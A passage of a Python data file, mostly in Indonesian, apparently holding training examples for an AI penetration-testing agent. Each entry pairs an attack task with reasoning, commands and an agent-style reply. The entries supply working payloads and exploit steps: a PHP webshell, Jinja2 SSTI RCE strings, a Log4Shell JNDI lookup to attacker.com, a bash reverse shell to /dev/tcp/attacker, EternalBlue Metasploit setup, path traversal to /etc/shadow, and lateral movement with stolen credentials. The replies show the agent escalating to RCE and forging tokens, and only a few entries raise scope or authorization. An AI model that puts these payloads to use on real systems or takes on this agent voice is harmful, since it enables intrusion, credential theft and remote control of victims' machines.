        "identifikasi parameter dulu: username, password, remember_me",
        "sqlmap dengan --forms untuk auto-detect dan test semua parameter",
        "mulai dengan detection saja (--level=1) sebelum exploitation"],
       ["sqlmap -u https://app.target.com/login --forms --dbs --level=1 --risk=1",
        "jika ditemukan: sqlmap -u URL --dump -T users --level=3",
        "dokumentasi: screenshot + sqlmap log sebagai evidence"],
       ["param_identify","injection_test","data_extraction","document"],
       [("sqlmap","automated SQL injection detection dan exploitation")],
       "selalu mulai dengan level rendah untuk minimasi impact pada production server",
       "app.target.com/login — MySQL terdeteksi, parameter username injectable",
       "web security tester",
       "Testing SQLi pada login form. sqlmap -u https://app.target.com/login --forms --dbs"),

    _e("directory bruteforce pada https://target.com untuk temukan hidden paths",
       ["directory bruteforce = enumerate path yang tidak linked secara publik",
        "gobuster lebih cepat untuk dir mode karena paralel",
        "ffuf lebih fleksibel untuk custom fuzzing patterns",
        "mulai dengan wordlist common, lalu medium jika ada temuan menarik"],
       ["gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -o dirs.txt",
        "ffuf -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt",
        "filter: -fc 404 untuk exclude 404"],
       ["dir_enum","path_discovery","filter_results"],
       [("gobuster","fast directory bruteforce"),("ffuf","flexible web fuzzer")],
       "403 paths juga penting — bisa bypass dengan technique path traversal",
       "target.com — /admin (403), /api (200), /backup (301) ditemukan",
       "web directory enumerator",
       "Directory bruteforce: gobuster dir -u https://target.com -w common.txt"),

    _e("XSS testing pada semua input fields di https://webapp.com",
       ["XSS = inject JavaScript ke dalam halaman yang di-render user lain",
        "identify semua input: search, comment, profile fields, URL params",
        "dalfox untuk automated XSS scanner",
        "manual test juga perlu untuk blind XSS (tidak langsung terlihat)"],
       ["dalfox url https://webapp.com/?q=test --silence",
        "manual: test setiap form field dengan payload <script>alert(1)</script>",
        "untuk blind XSS: gunakan xsshunter payload untuk out-of-band detection"],
       ["input_mapping","automated_xss","manual_verify","blind_xss"],
       [("dalfox","automated XSS vulnerability scanner")],
       "reflected XSS mudah ditemukan, stored XSS lebih berbahaya — prioritaskan stored",
       "webapp.com — /search parameter vulnerable XSS (reflected)",
       "web application tester",
       "XSS scan: dalfox url 'https://webapp.com/?q=test'"),

    _e("test SSRF vulnerability pada fitur URL import di https://app.target.com/import",
       ["SSRF = Server Side Request Forgery, server melakukan request ke URL yang kita control",
        "target: metadata service (169.254.169.254), internal services, file:// protocol",
        "mulai dengan external callback: webhook.site atau interactsh",
        "jika external callback berhasil: test internal IP ranges"],
       ["curl -X POST https://app.target.com/import -d 'url=https://webhook.site/UNIQUE'",
        "jika callback received: test http://169.254.169.254/latest/meta-data/ (AWS metadata)",
        "test http://localhost:8080 dan http://10.0.0.1 untuk internal service access"],
       ["external_callback","internal_ip_test","cloud_metadata_access","data_extract"],
       [("curl","manual SSRF testing"),("interactsh","out-of-band callback server")],
       "AWS metadata via SSRF bisa expose IAM credentials — highest impact SSRF scenario",
       "app.target.com/import — SSRF confirmed, AWS metadata accessible, IAM credentials leaked",
       "SSRF tester",
       "SSRF test: POST url=https://webhook.site/xxx → callback received! Testing metadata service..."),

    _e("test IDOR (Insecure Direct Object Reference) pada https://api.target.com/user/{id}",
       ["IDOR = akses resource user lain dengan mengubah ID",
        "enumerate ID: 1, 2, 3... atau UUID brute force",
        "check: apakah response berisi data user lain?",
        "horizontal vs vertical IDOR: akses user lain vs akses admin"],
       ["curl https://api.target.com/user/1 -H 'Authorization: Bearer TOKEN'",
        "burpsuite intruder: payload 1-1000 untuk enumerate user IDs",
        "perbandingan response: ID yang authorized vs ID yang tidak"],
       ["baseline_request","id_enumerate","response_compare","data_access_verify"],
       [("burpsuite","HTTP proxy dan intruder untuk IDOR testing"),
        ("curl","manual API testing")],
       "IDOR pada endpoint yang return sensitive data = high severity finding",
       "api.target.com/user/{id} — IDOR confirmed: akses semua 1500 user records",
       "API security tester",
       "IDOR test: curl /user/1 dengan token user → data user lain exposed!"),

    _e("test CORS misconfiguration pada https://api.target.com",
       ["CORS misconfiguration = browser bisa request API dari domain lain",
        "test: Access-Control-Allow-Origin: * atau reflect origin",
        "dengan credentials: lebih berbahaya jika Access-Control-Allow-Credentials: true",
        "exploit: buat halaman HTML yang kirim request ke API dan steal data"],
       ["curl -H 'Origin: https://evil.com' https://api.target.com/user -v",
        "check response: Access-Control-Allow-Origin: https://evil.com ?",
        "check: Access-Control-Allow-Credentials: true ?",
        "jika keduanya: CORS misconfiguration yang dapat dieksploitasi"],
       ["origin_inject","response_check","credential_cors_test","poc_create"],
       [("curl","CORS header testing"),("burpsuite","CORS misconfiguration analysis")],
       "CORS dengan credentials = akses API as victim user dari domain kita — critical",
       "api.target.com — CORS reflect any origin dengan credentials=true → critical finding",
       "CORS security tester",
       "CORS test: Origin: evil.com → Access-Control-Allow-Origin: evil.com, Credentials: true!"),

    _e("test JWT (JSON Web Token) vulnerabilities pada API target",
       ["JWT = token auth yang sering misconfigured",
        "common attacks: none algorithm, weak secret, algorithm confusion",
        "jwt_tool untuk automated JWT testing",
        "decode dulu dengan jwt.io atau python untuk understand struktur"],
       ["echo 'TOKEN' | python3 -c \"import base64,json,sys; parts=sys.stdin.read().strip().split('.'); print(json.loads(base64.b64decode(parts[1]+'==')))\"",
        "jwt_tool TOKEN -X a (algorithm confusion attack)",
        "jwt_tool TOKEN -C -d wordlist.txt (crack weak secret)"],
       ["token_decode","alg_confusion","secret_crack","none_attack"],
       [("jwt_tool","JWT security testing toolkit"),("python","JWT manual analysis")],
       "algorithm=none attack sering works pada legacy JWT library yang tidak di-update",
       "api.target.com — JWT algorithm confusion attack berhasil, admin access gained",
       "JWT security analyst",
       "JWT analysis: decoded header → alg:RS256. Testing confusion attack dengan HS256..."),

    _e("test XML External Entity (XXE) injection pada SOAP web service",
       ["XXE = inject XML entity untuk read local file atau SSRF",
        "target: endpoint yang accept XML input (SOAP, XML API, file upload XML)",
        "basic: <!ENTITY xxe SYSTEM 'file:///etc/passwd'>",
        "out-of-band: jika no response, gunakan OOB callback via DTD"],
       ["curl -X POST target.com/soap -d '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><root>&xxe;</root>'",
        "jika blind: OOB XXE via external DTD di server yang kita control",
        "burpsuite active scanner untuk automated XXE detection"],
       ["xml_injection","file_read","oob_xxe","dtd_craft"],
       [("burpsuite","XML and XXE testing"),("curl","manual XXE payload injection")],
       "XXE bisa lead ke arbitrary file read dan internal network SSRF — high severity",
       "target.com/soap — XXE confirmed, /etc/passwd readable, /etc/shadow next attempt",
       "XXE security tester",
       "XXE test: injecting SYSTEM entity → /etc/passwd content returned!"),

    _e("test file upload vulnerability pada https://target.com/upload",
       ["file upload = common vector untuk webshell upload dan RCE",
        "bypass: ubah extension, content-type, double extension, null byte",
        "php webshell: <?php system($_GET['cmd']); ?>",
        "check upload directory accessible, tidak di-execute by server"],
       ["upload file dengan nama shell.php — observe response",
        "bypass via content-type: ubah ke image/jpeg dalam request",
        "bypass via extension: shell.php.jpg atau shell.pHp",
        "akses file yang diupload: target.com/uploads/shell.php?cmd=id"],
       ["basic_upload_test","content_type_bypass","ext_bypass","shell_access"],
       [("burpsuite","intercept dan modify upload request"),
        ("curl","manual file upload testing")],
       "webshell access konfirmasi = RCE — screenshot sebagai evidence, jangan eksekusi command berbahaya",
       "target.com/upload — shell.php.jpg diupload, extension stripped, dieksekusi → RCE!",
       "file upload security tester",
       "File upload bypass: shell.php.jpg → server strip .jpg → shell.php executed! RCE confirmed."),

    _e("enumerate GraphQL API untuk introspection dan information disclosure",
       ["GraphQL introspection = query schema untuk discover semua types, queries, mutations",
        "sering enabled di production = information disclosure tentang API structure",
        "graphw00f untuk fingerprint dan detect GraphQL engine",
        "inQL burpsuite plugin untuk GraphQL testing"],
       ["curl -X POST https://api.target.com/graphql -d '{\"query\":\"{ __schema { types { name } } }\"}' -H 'Content-Type: application/json'",
        "graphw00f -f -d https://api.target.com/graphql (fingerprint)",
        "inQL atau graphql-voyager untuk visualize schema"],
       ["introspection_query","schema_extract","sensitive_query_find","data_access"],
       [("graphw00f","GraphQL fingerprinting"),("burpsuite","GraphQL testing via inQL")],
       "introspection enabled = attacker bisa map seluruh API — disable di production",
       "api.target.com/graphql — introspection enabled, admin mutations ditemukan",
       "GraphQL security analyst",
       "GraphQL introspection: __schema query → full schema exposed! Admin mutations found."),

    _e("test HTTP request smuggling pada target.com dengan smuggler tool",
       ["HTTP request smuggling = desync antara frontend proxy dan backend server",
        "TE.CL vs CL.TE tergantung mana yang diutamakan",
        "smuggler.py untuk automated detection",
        "impact: bypass security controls, access internal endpoints, session hijacking"],
       ["python3 smuggler.py -u https://target.com",
        "manual test dengan burpsuite: crafted TE+CL headers",
        "verify: timing difference antara benign dan malicious request"],
       ["automated_detect","manual_verify","impact_assess"],
       [("smuggler.py","HTTP request smuggling detection tool"),
        ("burpsuite","manual smuggling test")],
       "smuggling sangat environment-dependent — verify di staging jika possible sebelum production",
       "target.com — TE.CL smuggling confirmed, endpoint /internal accessible via smuggled request",
       "HTTP smuggling analyst",
       "Smuggling test: smuggler.py -u https://target.com → TE.CL variant detected!"),

    _e("test business logic vulnerability pada fitur diskon e-commerce",
       ["business logic vuln = bug dalam logika aplikasi, bukan technical vuln",
        "contoh: apply coupon berkali-kali, race condition pada checkout",
        "tidak bisa di-detect oleh automated scanner — harus manual",
        "dokumentasi detailed: step-by-step reproduction required"],
       ["test: apply coupon code sebelum dan sesudah threshold harga",
        "test: race condition — kirim 2 request checkout bersamaan (burpsuite turbo intruder)",
        "test: negative quantity, overflow total price, remove item setelah apply coupon"],
       ["coupon_logic_test","race_condition_test","price_manipulation","workflow_abuse"],
       [("burpsuite","HTTP proxy untuk business logic testing"),
        ("turbo intruder","race condition testing")],
       "business logic vuln sering high severity tapi low CVSS karena tidak ada technical exploit",
       "e-commerce target — coupon stacking allowed, race condition pada checkout: -$50 order",
       "business logic security tester",
       "Business logic test: coupon stacking → -$50 total possible! Race condition confirmed."),

    _e("test OAuth 2.0 misconfiguration pada SSO implementation target",
       ["OAuth misconfig = redirect_uri tidak divalidasi, state param missing (CSRF)",
        "redirect_uri bypass: menggunakan open redirect atau regex bypass",
        "PKCE missing = code interception attack",
        "implicit flow = token dalam URL = logged di server/proxy"],
       ["test redirect_uri: tambah karakter trailing, subdomain bypass",
        "check state parameter: apakah random dan divalidasi?",
        "test code reuse: apakah authorization code bisa digunakan lebih dari sekali?"],
       ["redirect_uri_test","state_csrf_test","code_interception","token_leakage"],
       [("burpsuite","OAuth flow interception dan testing")],
       "OAuth bugs bisa lead ke account takeover — high priority testing",
       "target.com SSO — redirect_uri bypass via open redirect, state missing → CSRF possible",
       "OAuth security tester",
       "OAuth test: redirect_uri=https://evil.com → code returned! State parameter missing → CSRF."),

    _e("test path traversal vulnerability pada file download endpoint",
       ["path traversal = akses file di luar intended directory",
        "payload: ../../../etc/passwd atau ..%2F..%2F..%2Fetc%2Fpasswd",
        "encoding bypass: double encoding, unicode encoding",
        "target: file parameter dalam URL atau POST body"],
       ["curl 'https://target.com/download?file=../../../etc/passwd'",
        "curl 'https://target.com/download?file=....//....//etc/passwd' (double slash bypass)",
        "burpsuite fuzzer dengan path traversal wordlist"],
       ["basic_traversal","encoding_bypass","deep_traversal","sensitive_file"],
       [("curl","manual path traversal testing"),
        ("burpsuite","fuzzing path traversal payloads")],
       "null byte injection (%00) bisa bypass extension check di beberapa platform",
       "target.com/download — path traversal confirmed, /etc/passwd dan /etc/shadow accessible",
       "path traversal tester",
       "Path traversal: ?file=../../../etc/passwd → file content returned! OS info disclosed."),

    _e("test template injection (SSTI) pada Jinja2/Flask application",
       ["SSTI = inject template expressions yang dieksekusi server-side",
        "Jinja2: {{7*7}} → 49 = confirmed vulnerable",
        "RCE via: {{config.__class__.__init__.__globals__['os'].popen('id').read()}}",
        "identify template engine dulu: berbeda engine = berbeda payload"],
       ["inject {{7*7}} ke semua input fields, search untuk '49' di response",
        "jika Jinja2: {{config.items()}} untuk info disclosure",
        "RCE: {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}"],
       ["template_detect","engine_identify","info_disclosure","rce_achieve"],
       [("burpsuite","SSTI testing dan payload injection")],
       "SSTI lead ke RCE dalam banyak kasus — sangat high severity",
       "Flask app — {{7*7}}=49 confirmed Jinja2 SSTI, RCE via template expression",
       "SSTI security analyst",
       "SSTI test: {{7*7}} → 49 returned! Jinja2 confirmed. Escalating to RCE..."),

    _e("enumerate vhost pada web server dengan ffuf",
       ["virtual host = multiple website pada satu IP — beberapa mungkin tidak terdaftar publik",
        "ffuf dengan -H 'Host: FUZZ.target.com' untuk vhost discovery",
        "wordlist: subdomains-top1million, custom wordlist dari perusahaan",
        "filter response: --fs untuk exclude same-size response"],
       ["ffuf -u https://10.0.0.100 -H 'Host: FUZZ.target.com' -w vhost_wordlist.txt -fs 1234",
        "gobuster vhost -u https://target.com -w subdomain_wordlist.txt",
        "verify: curl -H 'Host: internal.target.com' https://10.0.0.100"],
       ["vhost_fuzz","filter_diff","internal_vhost_access"],
       [("ffuf","virtual host enumeration"),("gobuster","vhost mode")],
       "internal vhost sering berisi admin interface atau development environments",
       "10.0.0.100 — internal.target.com vhost found: development environment dengan debug mode",
       "vhost enumeration analyst",
       "Vhost enum: ffuf Host:FUZZ → internal.target.com found! Debug mode exposed."),

    _e("scan WordPress site untuk vulnerabilities dengan wpscan",
       ["WordPress = CMS paling banyak digunakan, banyak plugin vulnerable",
        "wpscan untuk enumerate: plugins, themes, users, vulnerabilities",
        "API token diperlukan untuk vulnerability data terbaru",
        "fokus: outdated plugins dengan public CVE"],
       ["wpscan --url https://wp.target.com --enumerate p,t,u --api-token TOKEN",
        "wpscan --url https://wp.target.com --passwords rockyou.txt --usernames admin",
        "searchsploit wordpress [plugin-name] untuk manual CVE research"],
       ["wp_enum","plugin_vuln_check","user_enum","brute_attempt"],
       [("wpscan","WordPress vulnerability scanner"),("searchsploit","local exploit database")],
       "80% WordPress compromise via vulnerable plugins — fokus plugin CVE scan",
       "wp.target.com — 5 vulnerable plugins, admin user exposed, xmlrpc.php enabled",
       "WordPress security analyst",
       "WPScan: --enumerate p,t,u → 5 vulnerable plugins, admin user found!"),

    _e("test GraphQL batch query attack untuk rate limit bypass",
       ["GraphQL batch = kirim multiple queries dalam satu request",
        "rate limit per-request tapi bukan per-query = bypass dengan batching",
        "gunakan untuk: brute force password, OTP bypass, enumeration",
        "batching: [{query1}, {query2}] dalam satu HTTP request"],
       ["burpsuite: kirim array of login mutations dalam satu GraphQL request",
        "[{mutation login(user:'a',pass:'1')},{mutation login(user:'a',pass:'2')},...] x100",
        "observe: apakah semua 100 login attempt diproses? Rate limit triggered?"],
       ["batch_craft","rate_limit_test","brute_via_batch"],
       [("burpsuite","GraphQL batch request crafting dan testing")],
       "GraphQL batching bypass rate limit = brute force OTP atau password tanpa throttling",
       "GraphQL API — batch 100 login mutations dalam 1 request, semua diproses, no rate limit",
       "GraphQL attack specialist",
       "GraphQL batch attack: 100 mutations per request → all processed, rate limit bypassed!"),

    _e("test prototype pollution pada JavaScript web application",
       ["prototype pollution = inject properties ke Object.prototype via user input",
        "impact: bypass security checks, RCE di Node.js server-side",
        "payload: __proto__[isAdmin]=true atau constructor[prototype][isAdmin]=true",
        "ppmap untuk automated server-side prototype pollution detection"],
       ["ppmap -u 'https://target.com/?__proto__[test]=1' (server-side check)",
        "manual: inject via JSON body: {\"__proto__\":{\"isAdmin\":true}}",
        "check: apakah injected property muncul di response atau ubah behavior?"],
       ["client_side_test","server_side_detect","gadget_find","rce_chain"],
       [("ppmap","prototype pollution scanner"),("burpsuite","manual PP testing")],
       "server-side prototype pollution bisa lead ke RCE — critical severity",
       "target.com — PP via query string confirmed, server-side impact: debug mode enabled",
       "prototype pollution analyst",
       "PP test: ?__proto__[debug]=true → debug info appeared in response! SS-PP confirmed."),

    # ── EXPLOIT (71-90) ──────────────────────────────────────────────────────
    _e("exploit MS17-010 EternalBlue pada Windows 7 target 10.0.0.15",
       ["MS17-010 = SMB exploit, hanya valid pada unpatched Windows 7/Server 2008",
        "verify dulu: nmap smb-vuln-ms17-010 script",
        "jika confirmed vulnerable → metasploit exploit/windows/smb/ms17_010_eternalblue",
        "set payload ke meterpreter/reverse_tcp untuk post-exploitation capability"],
       ["nmap --script smb-vuln-ms17-010 10.0.0.15 -p 445",
        "use exploit/windows/smb/ms17_010_eternalblue",
        "set RHOSTS 10.0.0.15; set PAYLOAD windows/x64/meterpreter/reverse_tcp",
        "set LHOST 10.0.0.100; exploit"],
       ["vuln_verify","exploit_setup","payload_config","execute","post_exploit"],
       [("nmap","SMB vulnerability verification"),("metasploit","exploitation framework")],
       "verify vulnerability sebelum exploit untuk avoid false positive",
       "10.0.0.15 Windows 7 SP1 — MS17-010 confirmed vulnerable",
       "authorized penetration tester",
       "MS17-010 confirmed. Setting up: use exploit/windows/smb/ms17_010_eternalblue"),

    _e("gunakan searchsploit untuk cari exploit untuk vsftpd 2.3.4",
       ["vsftpd 2.3.4 = famous backdoor vulnerability dari 2011",
        "searchsploit untuk cari exploit di local exploitdb",
        "backdoor di port 6200 setelah trigger dengan smiley ':)'",
        "metasploit module tersedia"],
       ["searchsploit vsftpd 2.3.4","nmap -sV -p 21 target untuk verify version",
        "metasploit: use exploit/unix/ftp/vsftpd_234_backdoor",
        "set RHOSTS target; exploit"],
       ["vuln_research","version_verify","exploit_execute"],
       [("searchsploit","local exploit database search"),("metasploit","exploitation framework")],
       "vsftpd 2.3.4 backdoor sangat reliable — hampir tidak ada false positive jika version match",
       "vsftpd 2.3.4 terdeteksi — backdoor vulnerability confirmed",
       "CTF exploit researcher",
       "vsftpd 2.3.4 backdoor found. Executing: use exploit/unix/ftp/vsftpd_234_backdoor"),

    _e("exploit Apache Struts2 CVE-2017-5638 pada target enterprise",
       ["Struts2 S2-045 = RCE via Content-Type header injection",
        "payload dikirim dalam Content-Type HTTP header",
        "metasploit module tersedia: exploit/multi/http/struts2_content_type_ognl",
        "impact: RCE sebagai web server user"],
       ["nmap -sV -p 8080,8443 target untuk detect Struts version",
        "nuclei -t nuclei-templates/CVEs/2017/CVE-2017-5638.yaml -u http://target:8080",
        "metasploit: use exploit/multi/http/struts2_content_type_ognl; set RHOSTS target"],
       ["version_detect","nuclei_check","exploit_run","shell_obtain"],
       [("nmap","service version detection"),("nuclei","CVE-specific scan template"),
        ("metasploit","Struts2 exploitation")],
       "Struts exploit via Content-Type header — sangat straightforward jika unpatched",
       "target:8080 — Struts2 2.3.30 detected, CVE-2017-5638 confirmed, RCE as tomcat user",
       "enterprise exploit analyst",
       "Struts2 RCE: Content-Type header exploit → id=tomcat, hostname=webserver01"),

    _e("exploit Log4Shell CVE-2021-44228 pada Java application",
       ["Log4Shell = RCE via Log4j JNDI injection, sangat widespread",
        "payload: ${jndi:ldap://attacker.com/exploit} dalam any logged field",
        "test via: User-Agent, X-Forwarded-For, Username, semua input yang di-log",
        "callback via interactsh untuk detect bahkan jika tidak ada direct response"],
       ["python3 log4shell_tester.py -u https://target.com --callback 'ldap://interactsh.com/test'",
        "burpsuite: inject ${jndi:ldap://callback} ke semua headers",
        "jika callback received: setup JNDI exploit server untuk RCE"],
       ["input_identify","jndi_inject","callback_verify","exploit_serve","shell_obtain"],
       [("log4shell tester","Log4j JNDI injection scanner"),
        ("interactsh","out-of-band callback server")],
       "Log4Shell sangat pervasive — test semua Java apps dalam scope, termasuk third-party",
       "target.com — User-Agent field vulnerable, JNDI callback received, RCE achieved",
       "CVE exploitation analyst",
       "Log4Shell test: inject ${jndi:ldap://callback} → callback received! RCE chain setup..."),

    _e("exploit Spring4Shell CVE-2022-22965 pada Spring MVC application",
       ["Spring4Shell = RCE pada Spring Framework via ClassLoader manipulation",
        "hanya exploitable dengan JDK 9+ dan Spring 5.3.x sebelum 5.3.18",
        "exploit: inject classLoader property via data binding",
        "result: arbitrary file write → webshell upload"],
       ["nuclei -t CVE-2022-22965.yaml -u https://spring-app.target.com",
        "curl -X POST https://spring-app.target.com/upload -d 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&...'",
        "access: https://spring-app.target.com/exploit.jsp?cmd=id"],
       ["version_verify","poc_attempt","file_write","shell_access"],
       [("nuclei","CVE-2022-22965 detection template"),("curl","manual exploit delivery")],
       "Spring4Shell hanya works pada kondisi spesifik — verify dulu version dan JDK",
       "spring-app.target.com — Spring 5.3.17 + JDK 11, exploit berhasil, tomcat.jsp tertulis",
       "Java framework exploit analyst",
       "Spring4Shell: nuclei confirmed → POST exploit payload → shell.jsp accessible!"),

    _e("exploit Shellshock CVE-2014-6271 pada web server dengan CGI",
       ["Shellshock = bash function injection dalam environment variables",
        "target: CGI scripts yang menggunakan bash (/cgi-bin/)",
        "payload dalam HTTP headers: User-Agent, Referer, Cookie",
        "impact: RCE sebagai web server user"],
       ["curl -H 'User-Agent: () { :;}; /bin/bash -c \"id\"' https://target.com/cgi-bin/test.sh",
        "nmap --script http-shellshock --script-args uri=/cgi-bin/test.sh target.com",
        "reverse shell: () { :;}; bash -i >& /dev/tcp/attacker/4444 0>&1"],
       ["cgi_identify","shellshock_test","rce_confirm","reverse_shell"],
       [("curl","Shellshock payload delivery"),("nmap","Shellshock detection script")],
       "Shellshock pada legacy system — banyak embedded device masih vulnerable",
       "target.com/cgi-bin/test.sh — Shellshock confirmed, id=apache, reverse shell obtained",
       "CGI exploit specialist",
       "Shellshock: User-Agent: (){{ :;}}; id → apache returned! Establishing reverse shell..."),

    _e("exploit Heartbleed CVE-2014-0160 untuk extract memory dari HTTPS server",
       ["Heartbleed = buffer over-read di OpenSSL, bocorkan memory server",
        "data yang ter-bocor: private keys, credentials, session tokens",
        "sslscan untuk detect vulnerable OpenSSL version",
        "heartbleed PoC script untuk extract memory"],
       ["sslscan target.com:443 | grep -i heartbleed",
        "nmap --script ssl-heartbleed target.com -p 443",
        "python3 heartbleed.py target.com (memory extraction)"],
       ["version_detect","vuln_confirm","memory_extract","data_parse"],
       [("sslscan","SSL vulnerability scanner"),("nmap","Heartbleed detection script")],
       "Heartbleed = setiap extract mengembalikan konten memory berbeda — run multiple times",
       "target.com — OpenSSL 1.0.1f vulnerable, Heartbleed confirmed, session token extracted",
       "SSL exploit analyst",
       "Heartbleed: nmap ssl-heartbleed → VULNERABLE! Extracting memory: python3 heartbleed.py target.com"),

    _e("exploit weak SSH key pada target menggunakan authorized_keys injection",
       ["SSH key auth lemah: weak key generation, predictable key, reused key",
        "jika write access ke home directory via LFI/SSTI: inject public key ke authorized_keys",
        "Debian OpenSSL bug 2008: banyak SSH key generate dengan weak entropy",
        "snowdropped-ssh-keys database untuk known weak Debian keys"],
       ["identify: apakah ada LFI atau file write pada web app?",
        "generate keypair: ssh-keygen -t rsa",
        "inject: write pubkey ke /home/user/.ssh/authorized_keys via vuln",
        "connect: ssh -i private_key user@target.com"],
       ["file_write_identify","keypair_gen","authorized_keys_inject","ssh_login"],
       [("ssh-keygen","SSH key pair generation"),("ssh","SSH client")],
       "authorized_keys injection hanya works jika SSH server allow PubkeyAuthentication",
       "target.com — LFI ke file write, authorized_keys injected, SSH login berhasil",
       "SSH exploitation analyst",
       "SSH key injection: LFI → file write → authorized_keys → ssh -i key user@target.com"),

    _e("exploit PHP Object Injection untuk RCE pada web application",
       ["PHP Object Injection = inject serialized PHP object untuk trigger magic methods",
        "prerequisite: find unserialize() call dengan user input",
        "PHP generic gadget chains (phpggc) untuk generate exploit payloads",
        "impact: RCE, file write, atau other berbahaya operations"],
       ["phpggc -l (list available gadget chains)",
        "phpggc Laravel/RCE1 system 'id' -b (base64 payload)",
        "inject payload ke cookie, POST body, atau parameter yang di-unserialize",
        "verify: apakah command output muncul di response?"],
       ["gadget_list","payload_gen","injection_point","execute_verify"],
       [("phpggc","PHP gadget chain generator untuk deserialization")],
       "identify framework dulu: Laravel, Symfony, Yii — berbeda gadget chain",
       "target.com — Laravel app, phpggc RCE1 payload berhasil, id=www-data",
       "PHP deserialization exploit specialist",
       "PHP Object Injection: phpggc Laravel/RCE1 system id → injecting base64 payload..."),

    _e("exploit padding oracle attack untuk decrypt session cookie",
       ["padding oracle = leak info tentang decryption validity via error response",
        "padbuster untuk automated padding oracle exploitation",
        "target: CBC mode encrypted cookie atau parameter",
        "impact: decrypt ciphertext, forge encrypted values"],
       ["padbuster https://target.com/page ENCRYPTED_VALUE 8 -cookies 'session=VALUE'",
        "identify padding oracle: apakah error response berbeda untuk valid vs invalid padding?",
        "decrypt session cookie → modify content → re-encrypt → replay"],
       ["oracle_identify","decrypt_attack","plaintext_obtain","forge_encrypt"],
       [("padbuster","padding oracle attack automation tool")],
       "padding oracle butuh banyak requests — lambat tapi reliable jika oracle tersedia",
       "target.com — session cookie CBC encrypted, padbuster decrypted: user=guest, role=user",
       "cryptographic attack specialist",
       "Padding oracle: padbuster → decrypted session = user=guest. Forging admin token..."),

    # ── POST_EXPLOIT (91-100) ────────────────────────────────────────────────
    _e("setelah dapat shell di Windows target, lakukan privilege escalation",
       ["shell didapat → identifikasi current privilege: whoami /priv",
        "cek OS version dan patch level untuk known PE vulnerabilities",
        "winpeas untuk automated local PE check",
        "common paths: SeImpersonatePrivilege → PrintSpoofer/GodPotato"],
       ["whoami /all","systeminfo",r".\winpeas.exe",
        "check SeImpersonatePrivilege → PrintSpoofer64.exe -i -c cmd"],
       ["enum_privs","os_enum","auto_pe_check","pe_vector","execute_pe"],
       [("winpeas","automated Windows PE checker"),
        ("PrintSpoofer","SeImpersonatePrivilege exploitation")],
       "dokumentasi setiap step PE untuk report",
       "Windows 10 v1903, SeImpersonatePrivilege enabled → PrintSpoofer viable",
       "post-exploitation specialist",
       "Shell obtained. Enumerating: whoami /all → SeImpersonatePrivilege enabled!"),

    _e("lateral movement dari Windows machine ke domain controller",
       ["sudah ada credential domain user → lateral movement ke DC",
        "crackmapexec untuk test credential validity di seluruh network",
        "pass-the-hash jika memiliki NTLM hash",
        "evil-winrm untuk WinRM lateral access jika port 5985 open"],
       ["crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123!'",
        "evil-winrm -i 192.168.1.10 -u administrator -p 'Password123!'",
        "impacket-psexec administrator:Password123!@192.168.1.10"],
       ["cred_validation","network_spread","dc_access"],
       [("crackmapexec","SMB credential testing"),("evil-winrm","WinRM lateral movement"),
        ("impacket","Windows protocol exploitation toolkit")],
       "cek dahulu apakah WinRM enabled sebelum evil-winrm",
       "domain administrator — 3 machines accessible, DC di 192.168.1.1",
       "lateral movement specialist",
       "Credential valid. crackmapexec smb 192.168.1.0/24 -u administrator -p ..."),
]
